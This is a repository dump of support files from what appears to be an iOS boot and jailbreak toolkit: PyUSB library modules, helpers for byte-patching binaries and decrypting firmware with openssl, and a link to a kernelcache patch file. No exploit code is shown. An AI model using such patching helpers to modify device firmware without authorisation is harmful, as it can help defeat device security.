39 | Since version 1.0, main PyUSB implementation lives in the 'usb.core'
40 | module. New applications are encouraged to use it.
41 | """
42 |
43 | import logging
44 | import os
45 |
46 | __author__ = 'Wander Lairson Costa'
47 |
48 | # Use Semantic Versioning, http://semver.org/
49 | version_info = (1, 0, 0)
50 | __version__ = '%d.%d.%d' % version_info
51 |
52 | __all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
53 |
54 | def _setup_log():
55 | from usb import _debug
56 | logger = logging.getLogger('usb')
57 | debug_level = os.getenv('PYUSB_DEBUG')
58 |
59 | if debug_level is not None:
60 | _debug.enable_tracing(True)
61 | filename = os.getenv('PYUSB_LOG_FILENAME')
62 |
63 | LEVELS = {'debug': logging.DEBUG,
64 | 'info': logging.INFO,
65 | 'warning': logging.WARNING,
66 | 'error': logging.ERROR,
67 | 'critical': logging.CRITICAL}
68 |
69 | level = LEVELS.get(debug_level, logging.CRITICAL + 10)
70 | logger.setLevel(level = level)
71 |
72 | try:
73 | handler = logging.FileHandler(filename)
74 | except:
75 | handler = logging.StreamHandler()
76 |
77 | fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
78 | handler.setFormatter(fmt)
79 | logger.addHandler(handler)
80 | else:
81 | class NullHandler(logging.Handler):
82 | def emit(self, record):
83 | pass
84 |
85 | # We set the log level to avoid delegation to the
86 | # parent log handler (if there is one).
87 | # Thanks to Chris Clark to pointing this out.
88 | logger.setLevel(logging.CRITICAL + 10)
89 |
90 | logger.addHandler(NullHandler())
91 |
92 |
93 | _setup_log()
94 |
95 | # We import all 'legacy' module symbols to provide compatibility
96 | # with applications that use 0.x versions.
97 | from usb.legacy import *
98 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_debug.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | __author__ = 'Wander Lairson Costa'
30 |
31 | __all__ = ['methodtrace', 'functiontrace']
32 |
33 | import logging
34 | import usb._interop as _interop
35 |
36 | _enable_tracing = False
37 |
38 | def enable_tracing(enable):
39 | global _enable_tracing
40 | _enable_tracing = enable
41 |
42 | def _trace_function_call(logger, fname, *args, **named_args):
43 | logger.debug(
44 | # TODO: check if 'f' is a method or a free function
45 | fname + '(' + \
46 | ', '.join((str(val) for val in args)) + \
47 | ', '.join((name + '=' + str(val) for name, val in named_args.items())) + ')'
48 | )
49 |
50 | # decorator for methods calls tracing
51 | def methodtrace(logger):
52 | def decorator_logging(f):
53 | if not _enable_tracing:
54 | return f
55 | def do_trace(*args, **named_args):
56 | # this if is just a optimization to avoid unecessary string formatting
57 | if logging.DEBUG >= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for methods calls tracing
66 | def functiontrace(logger):
67 | def decorator_logging(f):
68 | if not _enable_tracing:
69 | return f
70 | def do_trace(*args, **named_args):
71 | # this if is just a optimization to avoid unecessary string formatting
72 | if logging.DEBUG >= logger.getEffectiveLevel():
73 | _trace_function_call(logger, f.__name__, *args, **named_args)
74 | return f(*args, **named_args)
75 | _interop._update_wrapper(do_trace, f)
76 | return do_trace
77 | return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
39 | # we support Python >= 2.4
40 | assert sys.hexversion >= 0x020400f0
41 |
42 | # On Python 3, reduce became a functools module function
43 | try:
44 | import functools
45 | _reduce = functools.reduce
46 | except (ImportError, AttributeError):
47 | _reduce = reduce
48 |
49 | # all, introduced in Python 2.5
50 | try:
51 | _all = all
52 | except NameError:
53 | _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )
54 |
55 | # we only have the builtin set type since 2.5 version
56 | try:
57 | _set = set
58 | except NameError:
59 | import sets
60 | _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
64 | def _next(iter):
65 | try:
66 | return next(iter)
67 | except NameError:
68 | return iter.next()
69 |
70 | # functools appeared in 2.5
71 | try:
72 | import functools
73 | _update_wrapper = functools.update_wrapper
74 | except (ImportError, AttributeError):
75 | def _update_wrapper(wrapper, wrapped):
76 | wrapper.__name__ = wrapped.__name__
77 | wrapper.__module__ = wrapped.__module__
78 | wrapper.__doc__ = wrapped.__doc__
79 | wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
84 | def as_array(data=None):
85 | if data is None:
86 | return array.array('B')
87 |
88 | if isinstance(data, array.array):
89 | return data
90 |
91 | try:
92 | return array.array('B', data)
93 | except TypeError:
94 | # When you pass a unicode string or a character sequence,
95 | # you get a TypeError if the first parameter does not match
96 | a = array.array('B')
97 | a.fromstring(data) # deprecated since 3.2
98 | return a
99 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
32 | descriptors = {
33 | 0x1 : "Device",
34 | 0x2 : "Configuration",
35 | 0x3 : "String",
36 | 0x4 : "Interface",
37 | 0x5 : "Endpoint",
38 | 0x6 : "Device qualifier",
39 | 0x7 : "Other speed configuration",
40 | 0x8 : "Interface power",
41 | 0x9 : "OTG",
42 | 0xA : "Debug",
43 | 0xB : "Interface association",
44 | 0xC : "Security",
45 | 0xD : "Key",
46 | 0xE : "Encryption type",
47 | 0xF : "Binary device object store (BOS)",
48 | 0x10 : "Device capability",
49 | 0x11 : "Wireless endpoint companion",
50 | 0x30 : "SuperSpeed endpoint companion",
51 | }
52 |
53 | device_classes = {
54 | 0x0 : "Specified at interface",
55 | 0x2 : "Communications Device",
56 | 0x9 : "Hub",
57 | 0xF : "Personal Healthcare Device",
58 | 0xDC : "Diagnostic Device",
59 | 0xE0 : "Wireless Controller",
60 | 0xEF : "Miscellaneous",
61 | 0xFF : "Vendor-specific",
62 | }
63 |
64 | interface_classes = {
65 | 0x0 : "Reserved",
66 | 0x1 : "Audio",
67 | 0x2 : "CDC Communication",
68 | 0x3 : "Human Interface Device",
69 | 0x5 : "Physical",
70 | 0x6 : "Image",
71 | 0x7 : "Printer",
72 | 0x8 : "Mass Storage",
73 | 0x9 : "Hub",
74 | 0xA : "CDC Data",
75 | 0xB : "Smart Card",
76 | 0xD : "Content Security",
77 | 0xE : "Video",
78 | 0xF : "Personal Healthcare",
79 | 0xDC : "Diagnostic Device",
80 | 0xE0 : "Wireless Controller",
81 | 0xEF : "Miscellaneous",
82 | 0xFE : "Application Specific",
83 | 0xFF : "Vendor Specific",
84 | }
85 |
86 | ep_attributes = {
87 | 0x0 : "Control",
88 | 0x1 : "Isochronous",
89 | 0x2 : "Bulk",
90 | 0x3 : "Interrupt",
91 | }
92 |
93 | MAX_POWER_UNITS_USB2p0 = 2 # mA
94 | MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
3 | def apply_patches(binary, patches):
4 | for (offset, data) in patches:
5 | binary = binary[:offset] + data + binary[offset + len(data):]
6 | return binary
7 |
8 | def aes_decrypt(data, iv, key):
9 | if len(key) == 32:
10 | aes = 128
11 | elif len(key) == 64:
12 | aes = 256
13 | else:
14 | print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
15 | sys.exit(1)
16 |
17 | p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
18 | stdout=subprocess.PIPE,
19 | stdin=subprocess.PIPE,
20 | stderr=subprocess.PIPE)
21 | (stdout, stderr) = p.communicate(input=data)
22 |
23 | if p.returncode != 0 or len(stderr) > 0:
24 | print 'ERROR: openssl failed: %s' % stderr
25 | sys.exit(1)
26 |
27 | return stdout
28 |
29 | def hex_dump(data, address):
30 | p = subprocess.Popen(['xxd', '-o', str(address)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
31 | (stdout, stderr) = p.communicate(input=data)
32 |
33 | if p.returncode != 0 or len(stderr) > 0:
34 | print 'ERROR: xxd failed: %s' % stderr
35 | sys.exit(1)
36 |
37 | return stdout
38 |
--------------------------------------------------------------------------------
/resources/kc.bpatch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/kc.bpatch
--------------------------------------------------------------------------------